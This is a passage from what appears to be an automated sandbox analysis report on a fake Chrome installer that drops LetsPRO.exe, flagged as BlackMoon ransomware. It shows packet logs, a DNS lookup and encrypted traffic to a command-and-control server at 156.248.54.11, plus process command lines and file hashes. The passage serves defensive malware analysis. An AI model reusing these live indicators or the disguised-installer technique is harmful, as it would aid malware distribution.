                                      Apr 26, 2024 12:53:44.696377993 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696394920 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696410894 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696419954 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.696449041 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.696461916 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696486950 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696511030 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696527958 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.696528912 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.696569920 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697025061 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697051048 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697093010 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697160006 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697192907 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697208881 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697227001 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697248936 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697251081 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697269917 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697273970 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697294950 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697313070 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697321892 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697346926 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697364092 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697365999 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697390079 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697403908 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697415113 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697442055 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697458029 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697508097 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697535992 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697549105 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697554111 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697597027 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697597980 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697628975 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697647095 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697669983 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697675943 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697702885 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697720051 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697741985 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697763920 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697782993 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697789907 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697813034 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697832108 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697853088 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697879076 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697896957 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697902918 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697923899 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697937965 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.697941065 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.697978973 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698103905 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698122025 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698148012 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698165894 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698179960 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698209047 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.698805094 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698858023 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698875904 CEST8049717156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:44.698899984 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:44.739739895 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:45.741082907 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:45.741118908 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:45.741168022 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:47.724289894 CEST4971780192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807812929 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807846069 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:50.807903051 CEST49719443192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:53:50.807908058 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:53:50.807977915 CEST44349719156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:01.974834919 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:02.989736080 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:03.344388008 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:03.344599962 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:08.851469040 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:08.927257061 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:09.206721067 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:09.281701088 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.255393982 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:10.610054016 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.610827923 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:10.611150980 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:11.016869068 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:21.630861998 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:22.364747047 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:22.903434038 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:22.958482981 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:23.074249029 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:23.477905989 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:40.380440950 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:40.735306978 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:40.786572933 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:40.840831995 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:54:41.246438980 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:54:59.818231106 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:55:00.174170971 CEST8049723156.248.54.11192.168.2.5
                                      Apr 26, 2024 12:55:00.328144073 CEST4972380192.168.2.5156.248.54.11
                                      Apr 26, 2024 12:55:00.732057095 CEST8049723156.248.54.11192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 26, 2024 12:53:34.047715902 CEST6479153192.168.2.51.1.1.1
                                      Apr 26, 2024 12:53:34.181503057 CEST53647911.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Apr 26, 2024 12:53:34.047715902 CEST192.168.2.51.1.1.10x2de2Standard query (0)156.248.54.11.webcamcn.xyzA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Apr 26, 2024 12:53:34.181503057 CEST1.1.1.1192.168.2.50x2de2No error (0)156.248.54.11.webcamcn.xyz156.248.54.11A (IP address)IN (0x0001)false

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549717156.248.54.11804320C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      TimestampBytes transferredDirectionData
                                      Apr 26, 2024 12:53:42.190856934 CEST16OUTData Raw: 10 00 00 00 6d 63 5c 00 00 00 00 00 ca 00 a7 a3
                                      Data Ascii: mc\
                                      Apr 26, 2024 12:53:42.556318998 CEST2643OUTData Raw: 53 0a 00 00 6d 63 5c 00 00 00 00 00 ca 00 a6 a3 99 92 36 4d 40 63 69 21 5c f4 ce bc 36 52 36 5a 36 6c 36 fc 99 f0 36 5f 36 58 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36
                                      Data Ascii: Smc\6M@ci!\6R6Z6l66_6X6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1192.168.2.549717156.248.54.1180
                                      TimestampBytes transferredDirectionData
                                      Apr 26, 2024 12:53:42.555778980 CEST115INData Raw: 73 00 00 00 6d 63 5c 00 00 00 00 00 ca 00 a7 91 99 ab 36 53 36 00 36 33 36 c6 99 aa 36 05 36 05 36 39 36 91 99 aa 36 0f 36 03 36 61 36 93 99 aa 36 57 36 06 36 38 36 96 99 a7 36 03 36 01 36 38 36 c1 99 aa 36 03 36 05 36 36 36 9b 99 a0 36 36 36 36
                                      Data Ascii: smc\6S663666696666a66W66866668666666666666666666666666666666
                                      Apr 26, 2024 12:53:42.912389994 CEST1289INData Raw: 12 1c 03 00 6d 63 5c 00 00 00 00 00 ca 00 a2 a3 99 92 36 4d 40 63 69 21 5c f4 ce bc 36 52 36 5a 36 6c 36 fc 99 f0 36 5f 36 58 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36
                                      Data Ascii: mc\6M@ci!\6R6Z6l66_6X6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666
                                      Apr 26, 2024 12:53:42.912501097 CEST1289INData Raw: 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36
                                      Data Ascii: 666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666
                                      Apr 26, 2024 12:53:42.912610054 CEST1289INData Raw: 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 e9 a4 a7 99 92 63 bd da b5 da 18 65 f5 12 e3 0a 61
                                      Data Ascii: 66666666666666666666666666666666666666666ceacrB[JJj>.]&Bmb>*Br>*z5u*~B<oKc_6,5uc|k\CB'uADi^m(|K>6u'(~92fU(5aQyc
                                      Apr 26, 2024 12:53:42.912626982 CEST229INData Raw: 96 5e 36 26 36 36 ff 40 a6 9a 54 65 bf 73 ce c9 55 d2 28 41 17 ed 43 32 05 f6 eb 69 5c ef 97 65 c9 40 3f 61 ff 63 5b 1a 56 26 b5 ce c9 42 20 0d e5 9c e7 2d bd cd 05 ed 43 b6 9d 99 1f 73 ca 66 bd e1 8d 7b 7f 14 d4 27 43 25 5c 36 50 dd b2 f1 92 76
                                      Data Ascii: ^6&66@TesU(AC2i\e@?ac[V&B -Csf{'C%\6Pv66@e\zf\6_fm:t:66@3WqsihmZ66666556C66666666666666666666666666666666666666666666666666
                                      Apr 26, 2024 12:53:43.272958994 CEST1289INData Raw: 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 7b f9 09 92 35 36 36 36 32 00 36 a3 66 6d 36 36 8e 36 36 00 36 a3 99 92 76 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 36 a3 99 92 36 36 36 36 36 00 3e a2 99 92
                                      Data Ascii: 66666666666{566626fm66666v6666666666666666666666>8)86?n*7zbh_DYQDWmXYBTe_XrOeRS;;6666/#JxKA7*xNpC`xAx8NpOKAgNpCwxJAy8KpXKA
                                      Apr 26, 2024 12:53:43.272998095 CEST1289INData Raw: 6f 55 5e fa fa fa fa fa cc 63 28 75 11 da 3a 0d 70 3a 73 30 90 59 19 d3 6b f5 65 bf 45 ce 78 dc 6a 61 b3 f6 4f 30 dc 33 23 c2 90 26 ea 3b 4e 6d 02 26 20 75 9a eb 2a 12 de 6a e2 36 a3 40 ef c8 b5 f2 3e 39 b7 73 5d 94 92 3a 36 36 bf 73 f8 5c a7 f1
                                      Data Ascii: oU^c(u:p:s0YkeExjaO03#&;Nm& u*j6@>9s]:66s\&66[mK<Wg6#&(su2By3h>ezR76F2 ]B8^6f#:"45pih>[FQcx~:B9pSE0FQcsa&K03m&m4&z
                                      Apr 26, 2024 12:53:43.273121119 CEST1289INData Raw: de 97 79 92 36 6f f5 fa fa cc fa 6f 55 5e fa fa 63 bd da 81 da a7 9d 92 36 97 26 a4 34 10 05 66 10 d7 ca bd 73 3e b3 86 fe a3 99 92 42 01 b5 88 e6 00 36 a3 99 e6 18 bd 63 3a bb 4d 26 f2 cb 1f b3 ca cd c9 c9 50 de 50 78 92 36 bd b8 86 36 00 36 28
                                      Data Ascii: y6ooU^c6&4fs>B6c:M&PPx666(B666gXfm`d.(n6(|oU^B960766YQc(u+'5`m^666;m+'&Hz66g966({:066H"H.H
                                      Apr 26, 2024 12:53:43.273197889 CEST1289INData Raw: 9c 36 a3 99 a9 3f 42 54 b5 f9 ff bd a2 12 c2 2a 0d 60 2e 43 55 bd f5 fd a9 60 0a 45 7b bd 10 bd fb 9d 1b 6c 32 bd 66 32 8b 2e 2a 83 55 36 36 36 36 36 c7 76 a7 99 92 36 36 bd a0 a6 00 36 a3 98 ec 6a bf 66 32 bb 96 ba a3 99 92 bf 26 bd a0 a6 00 36
                                      Data Ascii: 6?BT*`.CU`E{l2f2.*U66666v666jf2&66667pR7F.pRFK6B2xs:ihmZ^c{OO1FQ666666'6696666`>96{Jsr4fm3A6
                                      Apr 26, 2024 12:53:43.273312092 CEST1289INData Raw: b0 a8 36 a3 99 19 b8 92 36 36 36 8b 63 ab 14 96 f7 bd 7b 3a bf 10 bf eb 9d 6d b0 9e 36 36 36 5d f5 6f 55 5e fa fa fa fa fa cc fa 6f 55 5e bd 77 2a bd 60 18 61 28 61 b9 48 0a 1d cc 39 89 fd a3 99 92 1d f4 39 be f5 00 36 a3 12 14 96 36 36 36 bb be
                                      Data Ascii: 6666c{:m666]oU^oU^w*`a(aH996666e766dn*gyIC76w2./(}2>7VjH3'5&gm36#6661~*;xxRx<En2o./66Uv2666-66xj~666


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549723156.248.54.11804320C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      TimestampBytes transferredDirectionData
                                      Apr 26, 2024 12:54:08.851469040 CEST4702OUTData Raw: 5e 12 00 00 19 b2 5c 00 00 00 00 00 ca 00 49 4f d9 92 0f 36 04 36 18 00 07 4f de 92 0e 36 18 36 04 00 18 4f dd 92 16 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36
                                      Data Ascii: ^\IO66O66O66666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O66666
                                      Apr 26, 2024 12:54:08.927257061 CEST1289OUTData Raw: 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36
                                      Data Ascii: 6O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O
                                      Apr 26, 2024 12:54:10.255393982 CEST1289OUTData Raw: 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36
                                      Data Ascii: 66666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O_6U6DYOY6P6BOW6E6_UOd6S6XROD66rDO@6S6DO66O6{6
                                      Apr 26, 2024 12:54:10.611150980 CEST15OUTData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 84
                                      Data Ascii: \
                                      Apr 26, 2024 12:54:21.630861998 CEST15OUTData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86
                                      Data Ascii: \
                                      Apr 26, 2024 12:54:22.364747047 CEST15OUTData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86
                                      Data Ascii: \
                                      Apr 26, 2024 12:54:23.074249029 CEST574OUTData Raw: 3e 02 00 00 19 b2 5c 00 00 00 00 00 ca 00 4f 4f d8 92 16 36 5b 36 5f 00 58 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f b8 92 44 36 59 36 51 00 44 4f 89 92 5b 36 16 36 7b 00 57 4f 86 92 57 36 51 36 53 00 44 4f e8 92 36 36 36 36
                                      Data Ascii: >\OO6[6_XO666666O666666OD6Y6QDO[66{WOW6Q6SDO666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O66666
                                      Apr 26, 2024 12:54:40.380440950 CEST15OUTData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86
                                      Data Ascii: \
                                      Apr 26, 2024 12:54:40.840831995 CEST574OUTData Raw: 3e 02 00 00 19 b2 5c 00 00 00 00 00 ca 00 4f 4f d8 92 16 36 5b 36 5f 00 58 4f e8 92 36 36 36 36 36 00 36 4f e8 92 36 36 36 36 36 00 36 4f b8 92 44 36 59 36 51 00 44 4f 89 92 5b 36 16 36 7b 00 57 4f 86 92 57 36 51 36 53 00 44 4f e8 92 36 36 36 36
                                      Data Ascii: >\OO6[6_XO666666O666666OD6Y6QDO[66{WOW6Q6SDO666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O666666O66666
                                      Apr 26, 2024 12:54:59.818231106 CEST15OUTData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86
                                      Data Ascii: \


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.549723156.248.54.1180
                                      TimestampBytes transferredDirectionData
                                      Apr 26, 2024 12:54:10.610827923 CEST15INData Raw: 0f 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 85
                                      Data Ascii: \
                                      Apr 26, 2024 12:54:22.903434038 CEST16INData Raw: 10 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86 4f
                                      Data Ascii: \O
                                      Apr 26, 2024 12:54:40.735306978 CEST16INData Raw: 10 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86 4f
                                      Data Ascii: \O
                                      Apr 26, 2024 12:55:00.174170971 CEST16INData Raw: 10 00 00 00 19 b2 5c 00 00 00 00 00 ca 00 86 4f
                                      Data Ascii: \O


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:12:52:54
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sutup-Chrome.13.26.x64.msi"
                                      Imagebase:0x7ff691f80000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:1
                                      Start time:12:52:54
                                      Start date:26/04/2024
                                      Path:C:\Windows\System32\msiexec.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                      Imagebase:0x7ff691f80000
                                      File size:69'632 bytes
                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:3
                                      Start time:12:52:56
                                      Start date:26/04/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding F88407A7EB4CD1FAACECE5C8A82A6774
                                      Imagebase:0x390000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000004.00000002.3274998990.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 17%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:5
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: 00000005.00000002.2127759383.0000000010020000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
                                      Imagebase:0x400000
                                      File size:7'168 bytes
                                      MD5 hash:A5FC151170B4BEF53A2918729AA6D3A9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                                      Imagebase:0x250000
                                      File size:247'272 bytes
                                      MD5 hash:7BB188DFEE179CBDE884A0E7D127B074
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:12:52:57
                                      Start date:26/04/2024
                                      Path:C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
